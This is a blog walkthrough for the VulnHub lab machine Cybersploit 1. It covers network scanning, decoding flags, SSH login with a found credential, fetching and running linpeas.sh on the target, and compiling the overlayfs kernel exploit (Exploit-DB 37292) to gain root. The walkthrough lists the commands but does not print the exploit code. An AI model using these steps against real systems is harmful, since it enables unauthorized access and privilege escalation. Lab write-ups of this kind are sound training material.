How to hack into Cybersploit 1 from VulHub

Please update your system...

Nov 3, 2022 14:00 · liucreator

Table of Contents

Discover Target IP
Scan Ports
Port 80
Port 22
Explore possible Privilege Escalation possibility
Kernel Exploit - Privilege Escalation
- overlayfs Local privilege escalation
Getting the Flag

https://www.vulnhub.com/entry/cybersploit-1,506/

It’s it running Ubuntu 12.04 LTS, set use its preset in QEMU

Discover Target IP

sudo nmap -sn 192.168.122.1-255

Scan Ports

nmap -p- 192.168.122.181
nmap -p 22,80 -sC -sV 192.168.122.181
sudo nmap -sU 192.168.122.181 scan top 1000 UDP ports

Port 80

visit http://192.168.122.181/robots.txt
getting R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9
decoding it from base64, and get Flag 1

Good Work !
Flag1: cybersploit{youtube.com/c/cybersploit}

dirb http://192.168.122.181
nikto -host 192.168.122.181
if we inspect element view-source:http://192.168.122.181/ of the home page, we will get a username at line 48

<!-------------username:itsskv--------------------->

Port 22

we can now use ssh itsskv@192.168.122.181, and use password cybersploit{youtube.com/c/cybersploit} from flag one to login into the target machine
get flag2.txt from itsskv’s home, convert it from binary to text and get Flag 2:

good work !
flag2: cybersploit{https:t.me/cybersploit1}

Explore possible Privilege Escalation possibility

LinPeas.sh https://github.com/carlospolop/PEASS-ng
we can try wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh, but it won’t work as target machine doesn’t have SSL
so we download it onto the attacker’s machine, start a simple server using Python python3 -m http.server 4444 at port 4444
after SSH into the target machine, wget http://192.168.122.181:4444/linpeas.sh
chmod +x linpeas.sh and then run it

Kernel Exploit - Privilege Escalation

Becase kernel version is 3.13.0, it’s quite old, we can search for exploitation online
or searchsploit linux kernel 3.13.0

overlayfs Local privilege escalation

https://www.exploit-db.com/exploits/37292

We are going to use 37292 exploit
Download it from the website
or searchsploit -m 37292.c mirror it to our current working directory
compile it using gcc 37292.c -o 37292 or make 37292
just run it on target machine, now we are root

Getting the Flag

run bash to get a better shell
cat /root/finalflag.txt